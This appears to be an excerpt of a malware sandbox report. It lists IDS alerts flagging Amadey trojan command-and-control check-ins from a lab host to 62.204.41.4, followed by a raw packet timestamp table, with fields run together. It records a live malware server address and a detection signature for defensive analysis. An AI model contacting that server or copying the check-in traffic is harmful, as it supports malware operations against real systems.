                            192.168.2.462.204.41.450273802027700 02/08/23-17:40:05.210080TCP2027700ET TROJAN Amadey CnC Check-In5027380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450310802027700 02/08/23-17:40:15.001847TCP2027700ET TROJAN Amadey CnC Check-In5031080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450313802027700 02/08/23-17:40:16.587698TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449860802027700 02/08/23-17:38:15.268343TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450095802027700 02/08/23-17:39:19.370464TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450276802027700 02/08/23-17:40:05.953011TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449865802027700 02/08/23-17:38:16.496280TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450209802027700 02/08/23-17:39:49.582809TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449804802027700 02/08/23-17:37:55.542967TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450098802027700 02/08/23-17:39:20.119029TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450132802027700 02/08/23-17:39:28.720657TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450016802027700 02/08/23-17:39:00.164305TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449978802027700 02/08/23-17:38:48.712592TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449773802027700 02/08/23-17:37:45.744566TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449937802027700 02/08/23-17:38:35.731319TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450248802027700 02/08/23-17:39:59.059890TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450265802027700 02/08/23-17:40:03.200849TCP2027700ET TROJAN Amadey CnC Check-In5026580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450135802027700 02/08/23-17:39:29.463987TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450207802027700 02/08/23-17:39:49.091510TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449807802027700 02/08/23-17:37:56.250217TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450087802027700 02/08/23-17:39:17.420203TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449951802027700 02/08/23-17:38:39.117123TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449759802027700 02/08/23-17:37:42.369299TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450107802027700 02/08/23-17:39:22.315655TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449909802027700 02/08/23-17:38:27.165242TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450130802027700 02/08/23-17:39:28.215637TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449695802027700 02/08/23-17:37:24.659551TCP2027700ET TROJAN Amadey CnC Check-In4969580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449837802027700 02/08/23-17:38:06.766539TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449873802027700 02/08/23-17:38:18.447657TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450237802027700 02/08/23-17:39:56.348459TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450029802027700 02/08/23-17:39:03.307263TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449878802027700 02/08/23-17:38:19.667672TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450160802027700 02/08/23-17:39:35.471399TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449763802027700 02/08/23-17:37:43.325860TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449769802027700 02/08/23-17:37:44.792125TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449852802027700 02/08/23-17:38:10.929233TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450293802027700 02/08/23-17:40:10.028487TCP2027700ET TROJAN Amadey CnC Check-In5029380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449702802027700 02/08/23-17:37:26.146506TCP2027700ET TROJAN Amadey CnC Check-In4970280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449858802027700 02/08/23-17:38:14.073652TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450143802027700 02/08/23-17:39:31.370431TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450214802027700 02/08/23-17:39:50.800451TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450299802027700 02/08/23-17:40:11.500143TCP2027700ET TROJAN Amadey CnC Check-In5029980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450125802027700 02/08/23-17:39:26.996304TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450036802027700 02/08/23-17:39:05.033130TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450232802027700 02/08/23-17:39:55.156269TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450321802027700 02/08/23-17:40:19.144641TCP2027700ET TROJAN Amadey CnC Check-In5032180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450054802027700 02/08/23-17:39:09.433030TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449824802027700 02/08/23-17:38:00.290375TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449919802027700 02/08/23-17:38:29.584683TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449797802027700 02/08/23-17:37:52.616336TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450309802027700 02/08/23-17:40:14.212818TCP2027700ET TROJAN Amadey CnC Check-In5030980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449913802027700 02/08/23-17:38:28.132055TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449735802027700 02/08/23-17:37:36.528447TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449791802027700 02/08/23-17:37:50.073108TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449931802027700 02/08/23-17:38:34.030037TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449842802027700 02/08/23-17:38:07.992649TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449998802027700 02/08/23-17:38:55.809592TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449779802027700 02/08/23-17:37:47.176231TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449975802027700 02/08/23-17:38:47.996045TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450115802027700 02/08/23-17:39:24.252625TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450020802027700 02/08/23-17:39:01.119660TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450026802027700 02/08/23-17:39:02.587070TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449886802027700 02/08/23-17:38:21.612683TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450008802027700 02/08/23-17:38:58.198992TCP2027700ET TROJAN Amadey CnC Check-In5000880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450204802027700 02/08/23-17:39:48.373919TCP2027700ET TROJAN Amadey CnC Check-In5020480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450092802027700 02/08/23-17:39:18.634986TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450181802027700 02/08/23-17:39:42.912009TCP2027700ET TROJAN Amadey CnC Check-In5018180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450270802027700 02/08/23-17:40:04.450424TCP2027700ET TROJAN Amadey CnC Check-In5027080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449941802027700 02/08/23-17:38:36.694908TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449947802027700 02/08/23-17:38:38.153087TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449740802027700 02/08/23-17:37:37.821742TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449781802027700 02/08/23-17:37:47.651800TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449870802027700 02/08/23-17:38:17.723085TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449929802027700 02/08/23-17:38:33.000268TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450258802027700 02/08/23-17:40:01.487832TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449988802027700 02/08/23-17:38:53.036500TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449893802027700 02/08/23-17:38:23.319978TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450255802027700 02/08/23-17:40:00.759372TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449899802027700 02/08/23-17:38:24.742098TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450169802027700 02/08/23-17:39:37.723515TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449728802027700 02/08/23-17:37:34.522765TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449982802027700 02/08/23-17:38:50.300928TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450010802027700 02/08/23-17:38:58.684721TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450077802027700 02/08/23-17:39:14.979085TCP2027700ET TROJAN Amadey CnC Check-In5007780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450166802027700 02/08/23-17:39:36.964836TCP2027700ET TROJAN Amadey CnC Check-In5016680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450316802027700 02/08/23-17:40:17.940023TCP2027700ET TROJAN Amadey CnC Check-In5031680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450191802027700 02/08/23-17:39:45.295486TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449801802027700 02/08/23-17:37:54.834263TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450280802027700 02/08/23-17:40:06.937120TCP2027700ET TROJAN Amadey CnC Check-In5028080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449868802027700 02/08/23-17:38:17.239443TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449753802027700 02/08/23-17:37:40.932450TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449712802027700 02/08/23-17:37:28.587243TCP2027700ET TROJAN Amadey CnC Check-In4971280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449957802027700 02/08/23-17:38:40.557978TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450112802027700 02/08/23-17:39:23.514612TCP2027700ET TROJAN Amadey CnC Check-In5011280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450242802027700 02/08/23-17:39:57.575391TCP2027700ET TROJAN Amadey CnC Check-In5024280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449750802027700 02/08/23-17:37:40.228697TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450201802027700 02/08/23-17:39:47.669674TCP2027700ET TROJAN Amadey CnC Check-In5020180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449880802027700 02/08/23-17:38:20.163284TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450331802027700 02/08/23-17:40:21.630470TCP2027700ET TROJAN Amadey CnC Check-In5033180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450153802027700 02/08/23-17:39:33.775747TCP2027700ET TROJAN Amadey CnC Check-In5015380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450283802027700 02/08/23-17:40:07.638780TCP2027700ET TROJAN Amadey CnC Check-In5028380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450194802027700 02/08/23-17:39:45.998769TCP2027700ET TROJAN Amadey CnC Check-In5019480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450319802027700 02/08/23-17:40:18.663429TCP2027700ET TROJAN Amadey CnC Check-In5031980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450023802027700 02/08/23-17:39:01.855210TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450064802027700 02/08/23-17:39:11.871504TCP2027700ET TROJAN Amadey CnC Check-In5006480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449903802027700 02/08/23-17:38:25.713449TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450303802027700 02/08/23-17:40:12.489380TCP2027700ET TROJAN Amadey CnC Check-In5030380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449944802027700 02/08/23-17:38:37.430400TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449725802027700 02/08/23-17:37:32.936276TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449855802027700 02/08/23-17:38:12.691905TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449896802027700 02/08/23-17:38:24.036974TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449985802027700 02/08/23-17:38:51.647161TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449814802027700 02/08/23-17:37:57.900701TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.462.204.41.4
                            TimestampSource PortDest PortSource IPDest IP
                            Feb 8, 2023 17:37:24.598278999 CET4969580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.601300955 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.658931017 CET804969562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.659100056 CET4969580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.659550905 CET4969580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.663851023 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.663952112 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.664385080 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.719958067 CET804969562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.723897934 CET804969562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.724229097 CET4969580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.726727009 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.726803064 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.726886034 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.754415035 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.817042112 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817105055 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817138910 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817173958 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817202091 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.817205906 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817240953 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817241907 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.817254066 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.817279100 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817280054 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.817312956 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.817317963 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817351103 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817363024 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.817385912 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.817387104 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817421913 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.817424059 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.817457914 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.835282087 CET4969580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.835966110 CET4969780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.879908085 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.879955053 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.879972935 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.879991055 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.880002975 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.880022049 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.880027056 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.880059004 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.880063057 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.880095005 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.880095005 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.880125999 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.880127907 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.880155087 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.880157948 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.880189896 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.880198002 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.880234003 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.880243063 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.880280972 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.895905972 CET804969562.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.895968914 CET4969580192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.898364067 CET804969762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.898467064 CET4969780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.898910999 CET4969780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.942841053 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.942884922 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.942928076 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.942945957 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.942960978 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.942985058 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.942994118 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.942995071 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.943007946 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.943028927 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.943034887 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.943063021 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.943064928 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.943098068 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.943110943 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.943145037 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.943146944 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.943181992 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.943188906 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.943223000 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.943248034 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.943263054 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:24.961378098 CET804969762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.963576078 CET804969762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:24.963654041 CET4969780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.005779028 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.005853891 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.005903006 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.005934000 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.005968094 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.005999088 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.005999088 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.006032944 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.006042004 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.006051064 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.006068945 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.006077051 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.006103039 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.006103039 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.006138086 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.006139994 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.006171942 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.006172895 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.006217957 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.068712950 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.068789005 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.068835974 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.068865061 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.068891048 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.068916082 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.068947077 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.068969965 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.068979025 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.069005966 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.069029093 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.069029093 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.069052935 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.069060087 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.069084883 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.069098949 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.069117069 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.069138050 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.069158077 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.070050955 CET4969780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.070900917 CET4969880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.130137920 CET804969862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.130491018 CET4969880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.130949974 CET4969880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.131443977 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131485939 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131516933 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131547928 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131581068 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131613016 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131623030 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.131648064 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131681919 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131712914 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131743908 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131772041 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131793976 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.131804943 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.131855011 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.131906033 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.132503033 CET804969762.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.132591963 CET4969780192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.190428019 CET804969862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.194020033 CET804969862.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.194168091 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.194200039 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.194221020 CET4969880192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.194251060 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.194288969 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.194291115 CET4969680192.168.2.462.204.41.4
                            Feb 8, 2023 17:37:25.194329023 CET804969662.204.41.4192.168.2.4
                            Feb 8, 2023 17:37:25.194333076 CET4969680192.168.2.462.204.41.4
